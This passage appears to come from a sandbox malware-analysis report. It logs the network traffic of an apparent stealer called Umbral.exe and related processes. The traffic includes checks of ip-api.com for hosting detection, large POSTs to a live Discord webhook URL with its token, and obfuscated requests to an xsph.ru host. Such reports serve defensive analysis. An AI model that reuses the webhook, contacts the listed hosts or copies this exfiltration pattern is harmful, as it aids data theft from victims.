          IN PTR
          Response
          105.83.221.88.in-addr.arpa
          IN PTR
          a88-221-83-105.deploy.static.akamaitechnologies.com
        • flag-us
          DNS
          gstatic.com
          Umbral.exe
          Remote address:
          8.8.8.8:53
          Request
          gstatic.com
          IN A
          Response
          gstatic.com
          IN A
          172.217.16.227
        • flag-gb
          GET
          https://gstatic.com/generate_204
          Umbral.exe
          Remote address:
          172.217.16.227:443
          Request
          GET /generate_204 HTTP/1.1
          Host: gstatic.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 204 No Content
          Content-Length: 0
          Cross-Origin-Resource-Policy: cross-origin
          Date: Fri, 17 May 2024 20:41:15 GMT
          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
        • flag-us
          DNS
          ip-api.com
          LoaderMas.exe
          Remote address:
          8.8.8.8:53
          Request
          ip-api.com
          IN A
          Response
          ip-api.com
          IN A
          208.95.112.1
        • flag-us
          GET
          http://ip-api.com/line/?fields=hosting
          Umbral.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line/?fields=hosting HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:15 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 6
          Access-Control-Allow-Origin: *
          X-Ttl: 32
          X-Rl: 42
        • flag-us
          DNS
          227.16.217.172.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          227.16.217.172.in-addr.arpa
          IN PTR
          Response
          227.16.217.172.in-addr.arpa
          IN PTR
          mad08s04-in-f3.1e100.net
          227.16.217.172.in-addr.arpa
          IN PTR
          lhr48s28-in-f3 (record truncated in the capture)
        • flag-us
          DNS
          1.112.95.208.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          1.112.95.208.in-addr.arpa
          IN PTR
          Response
          1.112.95.208.in-addr.arpa
          IN PTR
          ip-api.com
        • flag-us
          DNS
          76.32.126.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          76.32.126.40.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          97.17.167.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          97.17.167.52.in-addr.arpa
          IN PTR
          Response
        • flag-us
          DNS
          ip-api.com
          LoaderMas.exe
          Remote address:
          8.8.8.8:53
          Request
          ip-api.com
          IN A
          Response
          ip-api.com
          IN A
          208.95.112.1
        • flag-us
          GET
          http://ip-api.com/line/?fields=hosting
          LoaderMas.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /line/?fields=hosting HTTP/1.1
          Host: ip-api.com
          Connection: Keep-Alive
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:21 GMT
          Content-Type: text/plain; charset=utf-8
          Content-Length: 6
          Access-Control-Allow-Origin: *
          X-Ttl: 27
          X-Rl: 39
        • flag-us
          GET
          http://ip-api.com/json/?fields=225545
          Umbral.exe
          Remote address:
          208.95.112.1:80
          Request
          GET /json/?fields=225545 HTTP/1.1
          Host: ip-api.com
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:26 GMT
          Content-Type: application/json; charset=utf-8
          Content-Length: 163
          Access-Control-Allow-Origin: *
          X-Ttl: 23
          X-Rl: 37
        • flag-us
          DNS
          g.bing.com
          Remote address:
          8.8.8.8:53
          Request
          g.bing.com
          IN A
          Response
          g.bing.com
          IN CNAME
          g-bing-com.dual-a-0034.a-msedge.net
          g-bing-com.dual-a-0034.a-msedge.net
          IN CNAME
          dual-a-0034.a-msedge.net
          dual-a-0034.a-msedge.net
          IN A
          204.79.197.237
          dual-a-0034.a-msedge.net
          IN A
          13.107.21.237
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          set-cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; SameSite=None; Secure; Priority=High;
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 608D481C766A42AB982DA35551B48144 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          set-cookie: MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ; domain=.bing.com; expires=Wed, 11-Jun-2025 20:41:26 GMT; path=/; Partitioned; secure; SameSite=None
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 9160C45EBCFF4A4A8A49B96491CF4514 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          GET
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          Remote address:
          204.79.197.237:443
          Request
          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid= HTTP/2.0
          host: g.bing.com
          accept-encoding: gzip, deflate
          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ
          Response
          HTTP/2.0 204
          cache-control: no-cache, must-revalidate
          pragma: no-cache
          expires: Fri, 01 Jan 1990 00:00:00 GMT
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          access-control-allow-origin: *
          x-cache: CONFIG_NOCACHE
          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
          x-msedge-ref: Ref A: 78AAE2FFA7E04F88977986C529109970 Ref B: LON04EDGE1211 Ref C: 2024-05-17T20:41:26Z
          date: Fri, 17 May 2024 20:41:26 GMT
        • flag-us
          DNS
          237.197.79.204.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          237.197.79.204.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          discord.com
          Umbral.exe
          Remote address:
          8.8.8.8:53
          Request
          discord.com
          IN A
          Response
          discord.com
          IN A
          162.159.128.233
          discord.com
          IN A
          162.159.135.232
          discord.com
          IN A
          162.159.136.232
          discord.com
          IN A
          162.159.138.232
          discord.com
          IN A
          162.159.137.232
        • Country: US
          POST
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          Umbral.exe
          Remote address:
          162.159.128.233:443
          Request
          POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
          Accept: application/json
          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
          Content-Type: application/json; charset=utf-8
          Host: discord.com
          Content-Length: 941
          Expect: 100-continue
          Connection: Keep-Alive
          Response
          HTTP/1.1 204 No Content
          Date: Fri, 17 May 2024 20:41:27 GMT
          Content-Type: text/html; charset=utf-8
          Connection: keep-alive
          set-cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
          x-ratelimit-limit: 5
          x-ratelimit-remaining: 4
          x-ratelimit-reset: 1715978488
          x-ratelimit-reset-after: 1
          via: 1.1 google
          alt-svc: h3=":443"; ma=86400
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKqUXEI9FBKbNVNvIKJqFavgiDAfX%2FEVk58AfAM8ovcHYciosRruYFWFIyg4x%2BU7Ozw7CQCRB9LYb17FAUT62QoiDi%2F8vNAsgf5bQbhLjtbEB82wpuLEKdf9uxnA"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          X-Content-Type-Options: nosniff
          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
          Set-Cookie: __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; Expires=Wed, 16-May-2029 20:41:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
          Set-Cookie: __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
          Set-Cookie: _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
          Server: cloudflare
          CF-RAY: 88566da9fb76240e-LHR
        • Country: US
          POST
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          Umbral.exe
          Remote address:
          162.159.128.233:443
          Request
          POST /api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ HTTP/1.1
          Accept: application/json
          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
          Content-Type: multipart/form-data; boundary="e0e3ec5c-5276-4798-b82a-f627bee59bf8"
          Host: discord.com
          Cookie: __dcfduid=d579be5a148d11efa4a1ea730e45241a; __sdcfduid=d579be5a148d11efa4a1ea730e45241a75557535158e6d9c61309e13f31ac86aef87e9668b3290eeb6a49fd6018412fc; __cfruid=bb69fbf806994cc378399a58956bff492d0a0137-1715978487; _cfuvid=wp9LJ0nQZ7GRugXk5Sr5yzdtRbDHnt5KcMzrbDJsWNQ-1715978487672-0.0.1.1-604800000
          Content-Length: 328880
          Expect: 100-continue
          Response
          HTTP/1.1 200 OK
          Date: Fri, 17 May 2024 20:41:28 GMT
          Content-Type: application/json
          Transfer-Encoding: chunked
          Connection: keep-alive
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
          x-ratelimit-limit: 5
          x-ratelimit-remaining: 4
          x-ratelimit-reset: 1715978489
          x-ratelimit-reset-after: 1
          vary: Accept-Encoding
          via: 1.1 google
          alt-svc: h3=":443"; ma=86400
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jw6PlB6jBoQlJyXdcxXpcX835RIA%2BVimcFqNuQ5wdFwDNsuXAFJABITwoIZr%2BT%2F7gSZUwzg5fiwhBd6vuW%2FRSk9LXfyuaE8b%2BfMzEF9II1Q%2FVz7jQFLGv6uuY04D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          X-Content-Type-Options: nosniff
          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
          Server: cloudflare
          CF-RAY: 88566dac1e84240e-LHR
        • Country: US
          DNS
          233.128.159.162.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          233.128.159.162.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          71.159.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          71.159.190.20.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          57.169.31.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          57.169.31.20.in-addr.arpa
          IN PTR
          Response
        • Country: BE
          GET
          https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
          Remote address:
          2.17.107.122:443
          Request
          GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
          host: www.bing.com
          accept: */*
          cookie: MUID=3B0A0F1575376C95179F1B9774D76DDA; MSPTC=Wbl7qRrr9oHR3dLn--kdfNrAbX_j2225WJUFnGXmoSQ
          accept-encoding: gzip, deflate, br
          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
          Response
          HTTP/2.0 200
          cache-control: public, max-age=2592000
          content-type: image/png
          access-control-allow-origin: *
          access-control-allow-headers: *
          access-control-allow-methods: GET, POST, OPTIONS
          timing-allow-origin: *
          report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QWthbWFp
          nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
          content-length: 1107
          date: Fri, 17 May 2024 20:41:29 GMT
          alt-svc: h3=":443"; ma=93600
          x-cdn-traceid: 0.766b1102.1715978489.60057ece
        • Country: US
          DNS
          122.107.17.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          122.107.17.2.in-addr.arpa
          IN PTR
          Response
          122.107.17.2.in-addr.arpa
          IN PTR
          a2-17-107-122.deploy.static.akamaitechnologies.com
        • Country: US
          DNS
          a0948305.xsph.ru
          StartMenuExperienceHost.exe
          Remote address:
          8.8.8.8:53
          Request
          a0948305.xsph.ru
          IN A
          Response
          a0948305.xsph.ru
          IN A
          141.8.192.103
        • Country: RU
          GET
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          StartMenuExperienceHost.exe
          Remote address:
          141.8.192.103:80
          Request
          GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
          Accept: */*
          Content-Type: application/json
          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
          Host: a0948305.xsph.ru
          Connection: Keep-Alive
          Response
          HTTP/1.1 403 Forbidden
          Server: openresty
          Date: Fri, 17 May 2024 20:41:33 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: keep-alive
          Vary: Accept-Encoding
        • Country: RU
          GET
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          StartMenuExperienceHost.exe
          Remote address:
          141.8.192.103:80
          Request
          GET /_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF HTTP/1.1
          Accept: */*
          Content-Type: application/json
          User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
          Host: a0948305.xsph.ru
          Response
          HTTP/1.1 403 Forbidden
          Server: openresty
          Date: Fri, 17 May 2024 20:41:33 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: keep-alive
          Vary: Accept-Encoding
        • Country: US
          DNS
          103.192.8.141.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          103.192.8.141.in-addr.arpa
          IN PTR
          Response
          103.192.8.141.in-addr.arpa
          IN PTR
          hnossfromsh
        • Country: US
          DNS
          157.123.68.40.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          157.123.68.40.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          18.31.95.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          18.31.95.13.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          172.210.232.199.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          172.210.232.199.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          144.107.17.2.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          144.107.17.2.in-addr.arpa
          IN PTR
          Response
          144.107.17.2.in-addr.arpa
          IN PTR
          a2-17-107-144.deploy.static.akamaitechnologies.com
        • Country: US
          DNS
          19.229.111.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          19.229.111.52.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          26.35.223.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          26.35.223.20.in-addr.arpa
          IN PTR
          Response
        • Country: US
          DNS
          30.73.42.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          30.73.42.20.in-addr.arpa
          IN PTR
          Response
        • 172.217.16.227:443
          https://gstatic.com/generate_204
          tls, http
          Umbral.exe
          868 B
          5.4kB
          11
          10

          HTTP Request

          GET https://gstatic.com/generate_204

          HTTP Response

          204
        • 208.95.112.1:80
          http://ip-api.com/line/?fields=hosting
          http
          Umbral.exe
          310 B
          267 B
          5
          2

          HTTP Request

          GET http://ip-api.com/line/?fields=hosting

          HTTP Response

          200
        • 208.95.112.1:80
          http://ip-api.com/line/?fields=hosting
          http
          LoaderMas.exe
          310 B
          387 B
          5
          5

          HTTP Request

          GET http://ip-api.com/line/?fields=hosting

          HTTP Response

          200
        • 208.95.112.1:80
          http://ip-api.com/json/?fields=225545
          http
          Umbral.exe
          285 B
          512 B
          5
          4

          HTTP Request

          GET http://ip-api.com/json/?fields=225545

          HTTP Response

          200
        • 204.79.197.237:443
          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=
          tls, http2
          2.0kB
          9.2kB
          21
          18

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204

          HTTP Request

          GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=f6d2477a8e9e41e59d120744b1fefafd&localId=w:1C8BDEF5-626C-207C-B098-8D9DBC09C387&deviceId=6966565258095583&anid=

          HTTP Response

          204
        • 162.159.128.233:443
          https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ
          tls, http
          Umbral.exe
          342.3kB
          11.2kB
          258
          114

          HTTP Request

          POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

          HTTP Response

          204

          HTTP Request

          POST https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

          HTTP Response

          200
        • 2.17.107.122:443
          https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
          tls, http2
          1.5kB
          6.4kB
          16
          12

          HTTP Request

          GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

          HTTP Response

          200
        • 141.8.192.103:80
          http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF
          http
          StartMenuExperienceHost.exe
          3.1kB
          118.5kB
          47
          88

          HTTP Request

          GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

          HTTP Response

          403

          HTTP Request

          GET http://a0948305.xsph.ru/_Defaultwindows.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&353b74c2c11b51923e96f36d4364b56c=bba95d1e1a7f0067e7a08e0fe06f794f&0fc0d795fe4911cf8ed61e542f1ae4f8=ANzADZ4MTZlJGOycjY4M2NhZjN5QTMxYTZyQDMkFTO0UTN4YDO1QGM&YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF

          HTTP Response

          403
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 127.0.0.1:30683
          LoaderMas.exe
        • 8.8.8.8:53
          154.239.44.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          154.239.44.20.in-addr.arpa

        • 8.8.8.8:53
          105.83.221.88.in-addr.arpa
          dns
          72 B
          137 B
          1
          1

          DNS Request

          105.83.221.88.in-addr.arpa

        • 8.8.8.8:53
          gstatic.com
          dns
          Umbral.exe
          57 B
          73 B
          1
          1

          DNS Request

          gstatic.com

          DNS Response

          172.217.16.227

        • 8.8.8.8:53
          ip-api.com
          dns
          LoaderMas.exe
          56 B
          72 B
          1
          1

          DNS Request

          ip-api.com

          DNS Response

          208.95.112.1

        • 8.8.8.8:53
          227.16.217.172.in-addr.arpa
          dns
          73 B
          140 B
          1
          1

          DNS Request

          227.16.217.172.in-addr.arpa

        • 8.8.8.8:53
          1.112.95.208.in-addr.arpa
          dns
          71 B
          95 B
          1
          1

          DNS Request

          1.112.95.208.in-addr.arpa

        • 8.8.8.8:53
          76.32.126.40.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          76.32.126.40.in-addr.arpa

        • 8.8.8.8:53
          97.17.167.52.in-addr.arpa
          dns
          71 B
          145 B
          1
          1

          DNS Request

          97.17.167.52.in-addr.arpa

        • 8.8.8.8:53
          ip-api.com
          dns
          LoaderMas.exe
          56 B
          72 B
          1
          1

          DNS Request

          ip-api.com

          DNS Response

          208.95.112.1

        • 8.8.8.8:53
          g.bing.com
          dns
          56 B
          151 B
          1
          1

          DNS Request

          g.bing.com

          DNS Response

          204.79.197.237
          13.107.21.237

        • 8.8.8.8:53
          237.197.79.204.in-addr.arpa
          dns
          73 B
          143 B
          1
          1

          DNS Request

          237.197.79.204.in-addr.arpa

        • 8.8.8.8:53
          discord.com
          dns
          Umbral.exe
          57 B
          137 B
          1
          1

          DNS Request

          discord.com

          DNS Response

          162.159.128.233
          162.159.135.232
          162.159.136.232
          162.159.138.232
          162.159.137.232

        • 8.8.8.8:53
          233.128.159.162.in-addr.arpa
          dns
          74 B
          136 B
          1
          1

          DNS Request

          233.128.159.162.in-addr.arpa

        • 8.8.8.8:53
          71.159.190.20.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          71.159.190.20.in-addr.arpa

        • 8.8.8.8:53
          57.169.31.20.in-addr.arpa
          dns
          71 B
          157 B
          1
          1

          DNS Request

          57.169.31.20.in-addr.arpa

        • 8.8.8.8:53
          122.107.17.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          122.107.17.2.in-addr.arpa

        • 8.8.8.8:53
          a0948305.xsph.ru
          dns
          StartMenuExperienceHost.exe
          62 B
          78 B
          1
          1

          DNS Request

          a0948305.xsph.ru

          DNS Response

          141.8.192.103

        • 8.8.8.8:53
          103.192.8.141.in-addr.arpa
          dns
          72 B
          99 B
          1
          1

          DNS Request

          103.192.8.141.in-addr.arpa

        • 8.8.8.8:53
          157.123.68.40.in-addr.arpa
          dns
          72 B
          146 B
          1
          1

          DNS Request

          157.123.68.40.in-addr.arpa

        • 8.8.8.8:53
          18.31.95.13.in-addr.arpa
          dns
          70 B
          144 B
          1
          1

          DNS Request

          18.31.95.13.in-addr.arpa

        • 8.8.8.8:53
          172.210.232.199.in-addr.arpa
          dns
          74 B
          128 B
          1
          1

          DNS Request

          172.210.232.199.in-addr.arpa

        • 8.8.8.8:53
          144.107.17.2.in-addr.arpa
          dns
          71 B
          135 B
          1
          1

          DNS Request

          144.107.17.2.in-addr.arpa

        • 8.8.8.8:53
          19.229.111.52.in-addr.arpa
          dns
          72 B
          158 B
          1
          1

          DNS Request

          19.229.111.52.in-addr.arpa

        • 8.8.8.8:53
